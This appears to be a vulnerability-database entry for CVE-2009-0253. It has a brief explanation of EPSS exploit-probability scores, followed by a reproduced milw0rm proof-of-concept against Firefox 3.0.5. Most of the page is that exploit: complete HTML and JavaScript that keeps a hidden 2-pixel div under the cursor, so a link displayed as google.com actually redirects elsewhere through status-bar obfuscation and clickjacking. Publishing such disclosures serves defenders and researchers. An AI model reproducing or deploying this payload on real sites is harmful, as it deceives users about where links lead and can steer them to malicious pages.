CVE-2009-0253 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking =========================================== <html> <body> <div id="mydiv" onmouseover="document.location='http://www.milw0rm.com';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.left=mouseX-1; document.getElementById('mydiv').style.top=mouseY-1; } </script> <center> <br> <font style="font-family:arial;font-size:32px">Status Bar Obfuscation / Clickjacking</font><br> <font style="font-family:arial;font-size:24px">By MrDoug</font><br> <br> <hr size="3" width="500" color="#000000"> <br> <font style="font-family:arial;font-size:20px">Click the VALID link to google below to visit milw0rm.com</font><br> <br> <a href="http://www.google.com" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://www.google.com</font></a><br> <br> <hr size="3" width="500" color="#000000"> <br> <font style="font-family:arial;font-size:16px">Greetz to Slappywag</font><br> </center> <div style="position:absolute;bottom:0;"> <font style="font-family:arial;font-size:32px">Note this...<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V </font> </div> </body> </html> =========================================== MrDoug mrdoug13[at]gmail[dot]com # milw0rm.com [2009-01-21]